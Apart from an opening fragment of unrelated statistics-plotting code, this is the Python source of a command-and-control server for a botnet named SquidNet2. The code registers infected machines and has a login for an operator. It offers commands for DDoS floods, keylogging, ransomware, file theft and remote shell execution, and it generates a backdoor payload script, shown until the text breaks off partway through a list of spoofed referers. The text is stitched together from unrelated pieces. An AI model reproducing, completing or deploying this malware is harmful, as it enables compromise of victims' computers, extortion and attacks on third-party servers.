diff_norm = (ratio-1.4484) / ratio_err diff_norm = diff_norm[diff_norm>0] gauss = lambda x,mu,std: 1/np.sqrt(2* np.pi*std**2) * np.exp(-0.5 * ((x - mu) / std)**2) log_likelihood = lambda std,x: - np.sum(np.log(gauss(x,0,std))) std = minimize(log_likelihood,[1],args=(diff_norm,)).x[0] if plot: fig, ax = plt.subplots(figsize=(4,3)) hist, bins, patches = ax.hist((ratio-1.4484) / ratio_err,bins=20,range=(0,6),color='silver') y2 = gauss(bins,0,1) ax.plot(bins,hist[0]/y2[0]*y2, '--',label='std=1',color='tab:blue') y = gauss(bins,0,std) ax.plot(bins,hist[0]/y[0]*y, '--',label=f'std={std:.2f}',color='tab:red') ax.legend() ax.set(xlabel="Deviation / Error",ylabel="Number of regions",yscale='log',ylim=[1,1.5*hist[0]]) plt.show() logger.info(f'std={std:.3f}') return std
import socket, threading, hashlib, os, datetime, time, sqlite3, shutil, urllib.request, json, sys class BotNet: """Main Class for the BotNet. Every single line of server code, payload code is inside of this class. There are many functions inside of the class, where they have many different uses. They vary in usefullness and effectiveness, nonetheless they all contribute to the overall functioning of the server. It uses a lot of logic and similar code from DatCord, which was a server that truly displayed my advancements in network programming, where it also is an improvement from the previous SquidNet. SquidNet2 does not have as many bugs, and also not as many useless functions. This script remains unfinished(I worked on it a lot on an airplane DX), so there could be many problems that could possibly occur.""" def logo(self): """Logo of the script, nothing too special here.""" logo = """ /\\ //\\\\ //__\\\\ //____\\\\ \\\____// \\\__// [|__|] [|__|] [|__|] [|__|] [|__|] [|__|] [|__|] /) [|__|] (\\ //\_________[|__|]________/\\\\ ))__________||__||_________(( <_/ [ \/ ] \_> || || || || || || || || || || || || || || || || || || _________ .__ .||_||_||__ __ ________ _____ _______ / _____/ ________ __|__| __|||/\ \ _____/ |_\_____ \ ___ __/ | | \ _ \ \_____ \ / ____/ | \ |/ __ | / | \_/ __ \ __\/ ____/ \ \/ / | |_ / /_\ \ / < <_| | | / / /_/ |/ | \ ___/| | / \ \ / ^ / \ \_/ \\ /_______ /\__ |____/|__\____ |\____|__ /\___ >__| \_______ \ \_/\____ | /\ \_____ / \/ |__| \/ || || \/ \/ \/ |__| \/ \/ || || || || || || || || || || || || || || || || || || \\\ || // \\\||// \\\// ____-\/-____ -__- / \\ Advanced Botnet By DrSquid [+] Github: https://github.com/DrSquidX""" return logo def __init__(self, ip, port, version, external_ip=None, external_port=None, admin_user="admin", admin_pass="adminpassword12345", logfile="log.txt", enc_key=b'iC0g4NM4xy5JrIbRV-8cZSVgFfQioUX8eTVGYRhWlF8=', ftp_dir="Bot_Files", ransomware_active=True): """Initiation of the class. Most of every important variable is mentioned here. This function is very important, as it has the definitions of all of the important variables needed for functionality, and also for specification of different things. Many things are defined here, such as the socket that will be used to handle all of the connections, as well as all of the smaller, yet very important variables that would hinder the performace and functionality of the script, if they were to be missing. There is also the use of some functions, as they are needed to help configure different things inside of the server.""" self.ip = ip self.port = int(port) self.downloading = False self.ddosing = False self.enc_key = enc_key self.botdownload = None self.ftp_dir = ftp_dir self.ransomware_active = ransomware_active self.external_ip = external_ip self.external_port = external_port self.admin_online = False self.logfile = logfile self.sqlfilename = "Server.db" self.filetransfer = False self.sqlconnected = False self.sending_file = False self.auto_ban = False self.keylogging = False self.botinfofile = "botinfo.txt" self.timetoautoban = 0 botinfo = open(self.botinfofile,"w").close() self.max_connpersec = 20 self.connpersec = 0 self.conncount = 0 self.timer = 1 self.conf_dbfile() file = open(self.logfile, "w").close() self.log(self.logo()) self.version = version if self.external_ip is None: self.external_ip = self.ip if self.external_port is None: self.external_port = self.port if self.ransomware_active: self.quot = "" else: self.quot = "'''" self.payload = self.gen_payload() self.payloadfile = open("SquidBot.py","w") self.payloadfile.write(self.payload) self.payloadfile.close() if self.ftp_dir not in os.listdir(): os.mkdir(self.ftp_dir) self.log(f"""[({datetime.datetime.today()})][(INFO)]: Server Started on {self.ip}:{self.port} [({datetime.datetime.today()})][(INFO)]: Bots/Admins will connect to: {self.external_ip}:{self.external_port} [({datetime.datetime.today()})][(INFO)]: Payload Bot Script Generated in {os.path.join(os.getcwd(), "SquidBot.py")}""") self.botnum = 1 self.connlist = [] self.botinfo = [] self.adminconn = None self.focusing = False self.focus_conn = None self.focus_botname = "" self.admin_username = admin_user self.admin_password = hashlib.sha256(admin_pass.encode()).hexdigest() self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) shutil.copyfile(os.path.join(os.getcwd(),self.payloadfile.name), os.path.join(os.getcwd(),self.ftp_dir,self.payloadfile.name)) self.log(f"[({datetime.datetime.today()})][(SERVER)]: Payload file has been transferred to the FTP directory(for extraction of Admin).") def exec_sql_cmd(self, file, cmd): """Optimization code made for executing commands on db files. The reason it was made was for optimization purposes. This excerpt of code would be pretty much all over the place in this script if it weren't a function, and it would make the script look less elegant and clean with all of the repitition.""" output = "" try: db = sqlite3.connect(file) cursor = db.cursor() cursor.execute(cmd) output = cursor.fetchall() db.commit() cursor.close() db.close() except Exception as e: self.log(f"[({datetime.datetime.today()})][(RESETSQL)]: Error with SQL Database file '{self.sqlfilename}': {e}, reconfiguring as a precaution.") self.conf_dbfile() return output def conf_dbfile(self): """This function helps configure the database file that contains the IP whitelists and banlists. As you can see, there is the previous function that was used to optimize the code. What the function truly does, is create the Database file if it doesn't already exist, and create the tables containing the IP banlist and whitelist if they do not exist.""" try: file = open(self.sqlfilename,"rb") except: file = open(self.sqlfilename,"wb") file.close() self.exec_sql_cmd(self.sqlfilename, "create table if not exists ipbanlist(ip)") self.exec_sql_cmd(self.sqlfilename, "create table if not exists ipallowlist(ip)") def return_iplist(self, list_type): """This gets a list of the IPs, although you need to specify whether it is from the IP Whitelist or the Banlist.""" banned_ips = self.exec_sql_cmd(self.sqlfilename, f"select ip from ip{list_type}list") new_ip_list = [] for i in banned_ips: new_ip_list.append(i[0]) return new_ip_list def add_ip(self, ip, list_type): """This adds an IP to the specified list type(either Whitelist or Banlist)""" self.exec_sql_cmd(self.sqlfilename, f"insert into ip{list_type}list values('{ip}')") def remove_ip(self, ip, list_type): """This removes an IP to the specified list type(either Whitelist or Banlist)""" self.exec_sql_cmd(self.sqlfilename, f"delete from ip{list_type}list where ip = '{ip}'") def help_msg(self): """The help message sent to the admins if they request it. It contains all of the information about the commands, and also the commands themselves. The arguements are provided, so that the user can get a sense of how to actually use the commands effectively.""" return """\n[(SERVER)]: Info about each command: [+] Utilities: [+] !whitelistip <ip> - Adds an IP to the whitelist, allowing them to connect to the server during a DDoS Attack. [+] !unwhitelistip <ip> - Removes an IP from the whitelist. [+] !banip <ip> - Bans an IP from the server, therefore having them kicked every time they try to connect to the server. [+] !unbanip <ip> - Removes an IP from the server. [+] !focusconn <botname> - Only be able to send or see messages from a single bot. [+] !stopfocus - Stops focus mode. [+] !getipwhitelist - Obtains the list of the IP Addresses in the Whitelist. [+] !getipbanlist - Obtains the list of the IP Addresses in the Banlist. [+] !getbotinfo - Displays information from each of the bots. [+] !help - Displays this message. [+] !startftp - Start file transfer protocol between the admin and the server(to get any transferred Bot Files). [+] !togglelisten - Toggles the setting for the server to listen for connections or not. [+] Bot Commands: [+] !filedownload <file> - Download a file on a single bot computer(requires focus mode). [+] !download <file> <link> - Make the bot download a file from the internet. [+] !mkdir <dir> - Create a folder inside of the bots working directory. [+] !delfolder <dir> - Remove a folder inside of the bots working directory. [+] !createfile <filename> - Create a file in the bots. [+] !delfile <filename> - Delete a file in the bots. [+] !encfile <filename> - Encrypt a file inside of the bots. [+] !decrypt <filename> - Decrypt a file that has been encrypted. [+] !open <filename> - Open a file inside of the bots working directory. [+] !viewfilecontent <file> - View the contents of a file in the bots directory. [+] !writefile <filename> - Open and write inside of a file inside of the bots. [+] !sqlconnect <sqlfile> - Connect to a Sqlite3 Compatable Database file in the bots. [+] !changedir <dir> - Changes the bots working directory to the one specified(use '%user%' as the user for multiple bots). [+] !stopsql - Disconnect from the connected Database file. [+] !stopwrite - Close writing mode and return to normal. [+] !getcwd - Get the current directory of the bots. [+] !keylog - Activate keylogging to see the bots keystrokes. [+] !stopkeylog - Stops the keylogging. [+] !listdir - List all of the items in the bots working directory. [+] !ransomware - Activates the ransomware program inside of the bots. [+] DDoS Attack Commands: [+] !httpflood <website> <delay> - Make the bots conduct an HTTP Flood Attack on the specified Website. [+] !tcpflood <ip> <port> <delay> <pkt_size> - Make the bots concuct a TCP Flood Attack on the specified IP and Port. [+] !udpflood <ip> <port> <delay> <pkt_size> - Make the bots concuct a UDP Flood Attack on the specified IP and Port. [+] !stopatk - Stops the current DDoS Attack that is happening(only one can happen at a time). [+] Note: Any other instructions will be run as shell commands on the remote computers.""" def file_tranfer_help_msg(self): """If the user decides to go onto FTP mode, they will be able to extract files that were extracted from the server via the connected bots. This is the help message sent to the user, if they request help. Like the previous help message, it has all the commands and the information and parameters about them, for the user to use these commands effectively.""" return """\n[(SERVER)]: Info about each command in FTP Mode. [+] !help - Displays this message. [+] !fileinfo - Displays all of the files inside of Server's directory. [+] !download [filename] - Downloads a specified file inside of the Server's directory. [+] !listdir - Gets all of the files inside of the Server's directory. [+] !stopftp - Return to the Botnet and controlling the bots. [+] Note: You will be unable to send messages to the bots in FTP Mode. You can return to normal by inputting '!stopftp'. """ def start(self): """This function is vital for the functionality of the server, because it actually starts it! It simply tries to bind the server to the IP and Port that were provided in the config file. If it doesn't work, an error message will be displayed, so that the user can get a sense of the problem.""" working = False try: self.server.bind((self.ip, self.port)) working = True except Exception as e: self.log(f"[({datetime.datetime.today()})][(ERROR)]: There was an error with binding the server: {e}. Try to change some of the variables in the Config files if needed.") if working: self.listener = threading.Thread(target=self.listen).start() def conn_persec_timer(self): """Function used for the not-so-perfect Anti-DDoS System. It measure the connections per second, and decides whether to take action against them(by that I mean banning them).""" while True: time.sleep(1) self.timer += 1 if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 if self.max_connpersec <= self.connpersec: self.timetoautoban += 1 if not self.auto_ban and self.timetoautoban >= 2: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: True") self.auto_ban = True else: if self.auto_ban: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: False") self.auto_ban = False self.timetoautoban = 0 if self.timer >= 60: self.timer = 1 self.connpersec = 1 self.conncount = 0 try: self.connpersec = self.conncount / self.timer except: pass def config_conn_vars(self): """Optimization code made for less repitition.""" self.connpersec = self.conncount / self.timer if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 self.conncount += 1 if self.max_connpersec <= self.connpersec: if not self.auto_ban and self.timetoautoban >= 2: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: True") self.auto_ban = True else: if self.auto_ban: self.log(f"[({datetime.datetime.today()})][(ANTI_DDOS)]: Setting 'self.auto_ban' variable to: False") self.auto_ban = False self.timetoautoban = 0 def listen(self): """A very important function for the server. It listens to all of the connections, if it is able to, as the 'self.listening' variable can be toggled on and off, making the server unable to listen for connections. It also has some of the Anti-DDoS code, where it also closes any connections inside of the banlist, and allows connections in the whitelist into the server without any interruption.""" self.log(f'[({datetime.datetime.today()})][(LISTEN)]: Server is listening.....') self.listening = True connpersectimer = threading.Thread(target=self.conn_persec_timer) connpersectimer.start() while True: if self.listening: try: self.server.listen() conn, ip = self.server.accept() if self.connpersec >= self.max_connpersec: self.connpersec = self.max_connpersec + 5 if self.listening: kicked = False if ip[0] in self.return_iplist("ban"): conn.close() kicked = True else: if self.auto_ban: if ip[0] in self.return_iplist("allow"): self.config_conn_vars() else: self.log(f"[({datetime.datetime.today()})][(BANNING_IP)]: {ip[0]} attempted to join the server during the DDoS Attack, banning as a precaution.") self.add_ip(ip[0],"ban") conn.close() kicked = True else: self.config_conn_vars() if not kicked: conn.send(f"SquidNet Server v{self.version}".encode()) handler = threading.Thread(target=self.handle, args=(conn, ip)) handler.start() else: conn.close() except Exception as e: self.log(f"[({datetime.datetime.today()})][(ERROR)]: There was an error with listening for connections: {e}") def obtain_botname_list(self): botnames = [] for i in self.botinfo: botnames.append(i[0]) return botnames def parse_info_msg(self, infomsg, conn, srcport): """There is a message sent by every client to the server, which would contain information about them. This include their hostname, IP Address, User, and Operating System. This is mainly for the bots, so that the admin would have a sense of the computer they have take control of. It returns a list of all of the information, to be used later.""" try: name = f"{infomsg.split()[1]}{self.botnum}" except: name = f"Bot{self.botnum}" self.botnum += 1 try: ip = infomsg.split()[2] except: ip = "127.0.0.1" try: osuser = infomsg.split()[3] except: osuser = "Unknown" try: os = infomsg.split()[4] except: os = "Unknown" self.botnum += 1 ogcontent = open(self.botinfofile,"r") content = ogcontent.read() file = open(self.botinfofile,"w") file.write(content) file.write(f"\n[+] Botname: {name}\n[+] IP: {ip}\n[+] Src Port: {srcport}\n[+] User: {osuser}\n[+] OS: {os}\n[+] Conn: {conn}\n") file.close() return [name, ip, srcport, osuser, os, conn] def get_filename(self, msg): """When there is a file trying to be provided for file transfering(etc), there might be files with names with spaces in them. This is a problem with my old system of file name obtaining, as the filenames with spaces would only have the first word of the file used to create or do something with said file. This function fixes that problem, by returning the actual name of the file.""" msg = msg.split() del msg[0] filename = "" for i in msg: filename += f" {i}" return filename.strip() def log(self, logitem, display=True): """Important function, needed for logging. This is so that the Server Owner can see what happened in the server, in case of a crash or bug that needed to be fixed. This helps, as all of the output in the server is the same as the output in the log file. The server owner would be able to see any bugs or issues, or easily anything that happened in the server at all. However, the log file is wiped everytime the server restarts(I can easily change that, you can contact me if you want that to happen).""" content = "" if display: print(logitem) try: file = open(self.logfile, "r") content = file.read() file.close() except Exception as e: print(f"[({datetime.datetime.today()})][(RESETLOG)]: Error with Log file '{self.logfile}': {e}, reconfiguring as a precaution.") content = f"""{self.logo()}\n[({datetime.datetime.today()})][(RESETLOG)]: Error with Log file '{self.logfile}': {e}, reconfiguring as a precaution.""" file = open(self.logfile,"w") file.write(content+"\n"+logitem) file.close() def send_to_other(self, sender, reciever, msg, recieverconn, send_raw=False): """Code for optimizing sending and logging at the same time. It logs the message that is being sent, and it also sends the message to the connection that the sender its trying to send to.""" item = f"[({datetime.datetime.today()})][({sender})--->({reciever})]: {msg}" self.log(item) if not send_raw: recieverconn.send(f"\n[({sender})]: {msg}".encode()) else: recieverconn.send(msg.encode()) def send_file(self, filename, conn): """Function needed for FTP. It sends all of the bytes of the file being transferred to the specified connection, which in this case it will be the server admin due to the function only being used in the transferring of files from the server to the server admin.""" self.sending_file = True file = open(filename, "rb") time.sleep(2) while True: sendto = file.read(10240) if not sendto: time.sleep(2) conn.send("!stopsave".encode()) break else: conn.send(sendto) time.sleep(5) self.send_to_other("SERVER",self.admin_username,"File Transfer completed.", conn) def handle(self, conn, ip): """Very important function, needed for handling the connections of the clients. The way a bot is recognized is quite simple really. There are many variables that help with the process. The handler first uses the information packet(the one with all of the client information), to see if the bot is a bot or a fake bot. If the information packet is invalid(if it does not start with '!botreg'), the connection will be simply closed. If the packet is valid, the Bot will have the ability to become an admin(if they have the correct credentials). If they are not an admin, they cannot do anything to take control of the server, but simply be able to send messages around to the admin and server. If the Bot is trying to be an admin, they can send an authentication message(in this case its '!login') followed by the credentials. These credentials are not displayed on the log. For authentication to happen. The username is checked with the server variable to see if they match. If they do, now the passwords need to match. There is password hashing in the server(sha256 hashing algorithm), for further security and to prevent any breaches. The password provided would be hashed into sha256, to see if it matches with the hashed password that the server has. It these all match, access is granted to the admin, where they can now do whatever they want with the bots, whether good or bad. There are many things to do with the assortment of commands that are provided.""" bot = False name = ip admin = False registered = False while True: try: display_single_msg = True msg_from_bot = conn.recv(10240) try: msg = str(msg_from_bot.decode()).strip() except: msg = str(msg) if msg.strip() != "": if not bot: info_packet = msg if not info_packet.startswith("!botreg"): conn.close() break else: self.connlist.append(conn) info = self.parse_info_msg(msg, conn, ip[1]) self.botinfo.append(info) name = info[0] ipaddr = info[2] if ipaddr in self.return_iplist("ban"): conn.close() break registered = True original_name = name self.log(f"[({datetime.datetime.today()})][(BOTJOIN)]: Bot {name} has joined the botnet.") try: self.adminconn.send(f"\n[(SERVER)]: Bot {name} has joined the botnet.".encode()) except: pass bot = True elif bot: if not admin: if msg.startswith("!login"): if not self.admin_online: try: username = msg.split()[1] password = msg.split()[2] if username == self.admin_username and hashlib.sha256(password.encode()).hexdigest() == self.admin_password: self.log(f"[({datetime.datetime.today()})][(INFO)]: A new admin session has been created.") name = self.admin_username admin = True self.adminconn = conn self.admin_online = True self.send_to_other("SERVER",name,"Successfully logged into the Botnet. You have access to all of the bots.", conn) self.send_to_other("SERVER",name,"Input '!help' if you need more info on the commands.", conn) for i in self.botinfo: if i[0] == original_name: self.botinfo.remove(i) break else: self.send_to_other("SERVER",name,"Authentication Failed.", conn) except: pass else: self.send_to_other("SERVER",name,"There is already an active owner session. Please wait until they log off.", conn) elif msg.startswith("!key") and self.keylogging: keystroke = msg.split()[1] keyfile = open(name+".txt","r") content = keyfile.read() keyfile.close() newkeyfile = open(name+".txt","w") newkeyfile.write(content) newkeyfile.write(f"\n[+] {keystroke}") newkeyfile.close() else: try: display_single_msg = False if not self.focusing: display_single_msg = True else: if conn == self.focus_conn: if not self.downloading: self.send_to_other(name, self.admin_username,msg, self.adminconn) else: try: if msg == "!stopsave": self.downloading = False self.botdownload.close() elif msg == "!fileerror": self.downloading = False self.botdownload.close() os.remove(self.botdownload.name) self.send_to_other("SERVER",self.admin_username,"There was an error with downloading the bot's file. Cancelling the download.") else: self.botdownload.write(msg_from_bot) except Exception as e: self.botdownload.write(msg_from_bot) except: display_single_msg = True elif admin: if not self.filetransfer: if msg.startswith("!help"): self.log(f"[({datetime.datetime.today()})][(SERVER)--->({self.admin_username})]: Sent the help message.") self.adminconn.send(self.help_msg().encode()) elif msg.startswith("!startftp"): self.send_to_other("SERVER",name, "Activiting FTP mode. You will be able to get files inside of the servers directory(for ex downloaded bot Files).", conn) self.send_to_other("SERVER",name, "You can input '!help' in case you need to know what commands are there for you.", conn) self.filetransfer = True elif msg.startswith("!focusconn"): try: botname = msg.split()[1] found = False for i in self.botinfo: if i[0] == botname: self.focus_conn = i[len(i)-1] found = True if found: self.send_to_other("SERVER",name,f"You can now only see output from bot {botname}.", conn) self.focus_botname = botname self.focusing = True except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !focusconn <botname>", conn) elif msg.startswith("!banip"): try: banned_ip = msg.split()[1] if banned_ip in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is in the whitelist! Unwhitelist it to ban it.", conn) elif banned_ip in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is already in the banlist!", conn) else: self.add_ip(banned_ip, "ban") self.send_to_other("SERVER",name,f"IP Address '{banned_ip}' has been banned from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !banip <ip>", conn) elif msg.startswith("!unbanip"): try: unbanning_ip = msg.split()[1] if unbanning_ip not in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is not in the banlist!", conn) else: self.remove_ip(unbanning_ip,"ban") self.send_to_other("SERVER",name,f"IP Address '{unbanning_ip}' has been unbanned from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !unbanip <ip>", conn) elif msg.startswith("!getipbanlist"): self.send_to_other("SERVER",name,f"IP Ban List: {self.return_iplist("ban")}", conn) elif msg.startswith("!getipwhitelist"): self.send_to_other("SERVER",name,f"IP White List: {self.return_iplist("allow")}", conn) elif msg.startswith("!whitelistip"): try: whitelist_ip = msg.split()[1] if whitelist_ip in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is already in the whitelist!", conn) elif whitelist_ip in self.return_iplist("ban"): self.send_to_other("SERVER",name,f"The IP Address specified is in the banlist!", conn) else: self.add_ip(whitelist_ip, "allow") self.send_to_other("SERVER",name,f"IP Address '{whitelist_ip}' has been whitelisted in the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !whitelistip <ip>", conn) elif msg.startswith("!unwhitelistip"): try: unwhitelist_ip = msg.split()[1] if unwhitelist_ip not in self.return_iplist("allow"): self.send_to_other("SERVER",name,f"The IP Address specified is not in the whitelist!", conn) else: self.remove_ip(unwhitelist_ip,"allow") self.send_to_other("SERVER",name,f"IP Address '{unwhitelist_ip}' has been unwhitelisted from the server.", conn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !unwhitelistip <ip>", conn) elif msg.startswith("!togglelisten"): if self.listening == True: self.listening = False elif self.listening == False: self.listening = True self.log(f"[({datetime.datetime.today()})][(INFO)]: Listening for connections has been set to: {self.listening}") self.adminconn.send(f"\n[(SERVER)]: Listening for connections has been set to: {self.listening}".encode()) elif msg.startswith("!stopfocus"): if not self.focusing: self.send_to_other("SERVER",name,"You are not focusing on a bot right now!", conn) else: self.focusing = False self.focus_conn = None self.send_to_other("SERVER",name,f"Stopped focusing on bot {self.focus_botname}.", conn) self.focus_botname = "" elif msg.startswith("!getbotinfo"): if len(self.botinfo) == 0: self.send_to_other("SERVER",name, "There are no bots connected to the Botnet at the moment.", conn) for bot in self.botinfo: if "closed" in str(bot[5]): self.botinfo.remove(bot) else: self.send_to_other("SERVER",name,f"Info on Bot {bot[0]} - IP: {bot[1]} Src-Port: {bot[2]} User: {bot[3]} OS: {bot[4]} Conn: {bot[5]}", self.adminconn) elif msg.startswith("!filedownload"): try: filename = self.get_filename(msg) if self.downloading: self.send_to_other("SERVER",name,"You are already downloading a file from the bot computer!", conn) else: if self.focusing: self.botdownload = open(os.path.join(os.getcwd(),f"{self.ftp_dir}/{filename}"),"wb") self.downloading = True self.send_to_other(self.admin_username,self.focus_botname,msg, self.focus_conn, True) self.send_to_other("SERVER",name,f"Attempting to download file {filename} from {self.focus_botname}. You will not be able to send instructions to any of the bots until the download finishes!", conn) else: self.send_to_other("SERVER",name,"You need to be in focus mode to be able to download files from bots(there would be a lot of traffic going on in the server)!", conn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !filedownload <filename>", conn) else: if msg.startswith("!stopatk"): if self.ddosing: if not self.focusing: self.ddosing = False self.send_to_other("SERVER",self.admin_username,"Attempting to stop all DDoS Attacks in the botnet.",self.adminconn) else: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will stop attacking!",self.adminconn) elif not self.ddosing: self.send_to_other("SERVER",self.admin_username,"The Bots are currently not attacking any domain.",self.adminconn) elif msg.startswith("!keylog"): self.send_to_other("SERVER",self.admin_username,"Activating Keylogger script on the bots(All of the logged keystrokes will be in a txt file with the bot's name).",self.adminconn) self.keylogging = True botnames = self.obtain_botname_list() for i in botnames: try: keylogfile = open(f"{i}.txt","r") except: keylogfile = open(f"{i}.txt","w") keylogfile.write(f"\nLOGGED KEYSTROKES FOR BOT {i}\n") keylogfile.close() elif msg.startswith("!stopkeylog"): self.keylogging = False self.send_to_other("SERVER",self.admin_username,"Deactivating Keylogger script on the bots.",self.adminconn) elif msg.startswith("!ransomware"): if self.ransomware_active: if self.focusing: self.send_to_other("SERVER",name,"Only the bot in focus mode has had the ransomware program activated!", conn) else: self.send_to_other("SERVER",name,"Ransomware programs are activating!", conn) self.send_to_other("SERVER",name,"Payloads are effective!", conn) else: self.send_to_other("SERVER",name,"The ransomware has been disabled in the config file. Turn the value assigned to 'ransomware_active' to 't'", conn) elif msg.startswith("!download"): try: filename = msg.split()[1] website = msg.split()[2] self.send_to_other("SERVER",self.admin_username,f"Making the bots download contents from '{website}' into file {filename}",self.adminconn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !download <filename> <website>", conn) elif msg.startswith('!httpflood'): if self.ddosing: self.send_to_other("SERVER",self.admin_username,"There is already an ongoing DDoS Attack! Please stop the attack if you want to start a new one(input '!stopatk').",self.adminconn) else: msgtobot = msg.split() if self.focusing: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will start attacking!",self.adminconn) else: self.ddosing = True try: targ_website = msgtobot[1] atk_delay = float(msgtobot[2]) self.send_to_other("SERVER",self.admin_username,f"Beginning HTTP Flood Attack on {targ_website} with delay of {atk_delay}.",self.adminconn) except: self.send_to_other("SERVER",name,"Invalid input! Here is the valid input: !httpflood <website> <atk_delay>", conn) elif msg.startswith('!udpflood') or msg.startswith("!tcpflood"): if self.ddosing: self.send_to_other("SERVER",self.admin_username,"There is already an ongoing DDoS Attack! Please stop the attack if you want to start a new one(input '!stopatk').",self.adminconn) else: if self.focusing: self.send_to_other("SERVER",self.admin_username,"You are in focus mode! Only the bot you are focusing will start attacking!",self.adminconn) else: self.ddosing = True if msg.startswith('!udpflood'): protocol = "UDP" elif msg.startswith("!tcpflood"): protocol = "TCP" msgtobot = msg.split() try: target = msgtobot[1] try: port = int(msgtobot[2]) except: port = 80 try: delay = float(msgtobot[3]) except: delay = 0 self.send_to_other("SERVER",self.admin_username,f"Beginning {protocol} Flood Attack on {target}:{port} with delay of {delay}.",self.adminconn) except: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !{protocol.lower()}flood <ip> <port> <delay>", conn) if not self.focusing and not self.downloading: if msg.strip() != "": self.log(f"[({datetime.datetime.today()})][({self.admin_username})--->(BOTS)]: {msg}") display_single_msg = False for bot in self.connlist: try: if conn != bot: if msg.startswith("!ransomware") and not self.ransomware_active: pass else: bot.send(msg.encode()) except: pass else: if not self.downloading: if msg.strip() != "": display_single_msg = False self.log(f"[({datetime.datetime.today()})][({self.admin_username})--->({self.focus_botname})]: {msg}") self.focus_conn.send(msg.encode()) elif self.filetransfer: if msg.startswith("!help"): self.adminconn.send(self.file_tranfer_help_msg().encode()) self.log(f"[({datetime.datetime.today()})][(SERVER)--->({self.admin_username})]: Sent the FTP Help message.") elif msg.startswith("!download"): try: filename = self.get_filename(msg) file = open(os.path.join(os.getcwd(),f"{self.ftp_dir}/{filename}"),"rb") file.close() self.send_to_other("SERVER",name, f"Preparing to download file: {file.name}.", conn) self.send_file(file.name, conn) except FileNotFoundError: self.send_to_other("SERVER",name,f"The file specified does not exist!", conn) except Exception as e: self.send_to_other("SERVER",name,f"Invalid input! Here is the valid input: !download <file>", conn) elif msg.startswith("!listdir"): dirlist = os.listdir(path=os.path.join(os.getcwd(), self.ftp_dir)) self.send_to_other("SERVER",name,f"Files extracted from bots: {dirlist}",conn) elif msg.startswith("!stopftp"): self.send_to_other("SERVER",name,"De-Activating FTP Mode. Returning to the Botnet. You will be able to send commands to the bots.",conn) self.filetransfer = False if display_single_msg: if not msg.startswith("!login"): if not msg.startswith("!key") and msg.strip() != "": self.log(f"[({datetime.datetime.today()})][({name})]: {msg}") if conn != self.adminconn: self.adminconn.send(f"\n[({name})]: {msg}".encode()) else: self.log(f"[({datetime.datetime.today()})][({name})]: Attempting to log into the Admin Account.") except Exception as e: if registered: self.log(f"[({datetime.datetime.today()})][(ERROR)]: Closing connection with {name} due to error: {e}") if conn == self.adminconn: self.log(f"[({datetime.datetime.today()})][(INFO)]: The admin has left the Botnet.") self.adminconn = None self.admin_online = False else: try: if registered: self.adminconn.send(f"[(SERVER)]: {name} has disconnected from the Botnet.".encode()) except: pass if conn == self.focus_conn: self.send_to_other("SERVER",self.admin_username,f"The Bot you were focusing on has disconnected from the Botnet, going back to normal.", self.adminconn) self.focusing = False self.focus_conn = None self.focus_botname = "" self.downloading = False try: self.connlist.remove(conn) except: pass conn.close() break def gen_payload(self): """The Payload script is located here. It is generated based on the server variables in the '__init__' function. This is what the bots use to connect to the server. This script is really a backdoor, which opens the victim to having their computer controlled remotely by the admin. There are a lot of referer and useragent tags, and the reason for that is the DDoS Function. If the user, for whatever reason wants to commit a large scale DDoS Attack, they need to have uniqueness with the HTTP Headers, so that it could help confuse the server they are attacking, and eventually bring it down(Servers are really secure nowadays and DDoSing is illegal, so only DDoS Your own servers please). There is also all of the code needed for controlling the bot. The functions are divided into different classes, with the 3 types of DDoS Functions divided into different classes, with the main bot code in one separate class itself.""" payload = """ import socket, threading, os, sys, urllib.request, random, time, shutil, subprocess, sqlite3 try: from cryptography.fernet import Fernet from pynput.keyboard import Listener except: pass class DDoS: def __init__(self, ip, delay): self.ip = ip self.delay = delay self.stopatk = False self.useragents = self.obtain_user_agents() self.referers = self.obtain_referers() self.threader = threading.Thread(target=self.start_thr) self.threader.start() def obtain_referers(self): referers = ['http://www.google.com/?q=', 'http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..', 'http://vk.com/profile.php?redirect=', 'http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=query?=query=..', 'https://www.google.ru/#hl=ru&newwindow=1?&saf..,or.r_gc.r_pw=?.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=882', 'https://www.google.ru/#hl=ru&newwindow=1&safe..,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp=fd2cf4e896a87c19&biw=1680&bih=925', 'http://yandex.ru/yandsearch?text=', 'https://www.google.ru/#hl=ru&newwindow=1&safe..,iny+gay+q=pcsny+=;zdr+query?=poxy+pony&gs_l=hp.3.r?=.0i19.505.10687.0.10963.33.29.4.0.0.0.242.4512.0j26j3.29.0.clfh..0.0.dLyKYyh2BUc&pbx=1&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.,cf.osb&fp?=?fd2cf4e896a87c19&biw=1389&bih=832', 'http://go.mail.ru/search?mail.ru=1&q=', 'http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..', 'http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..', 'http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..', 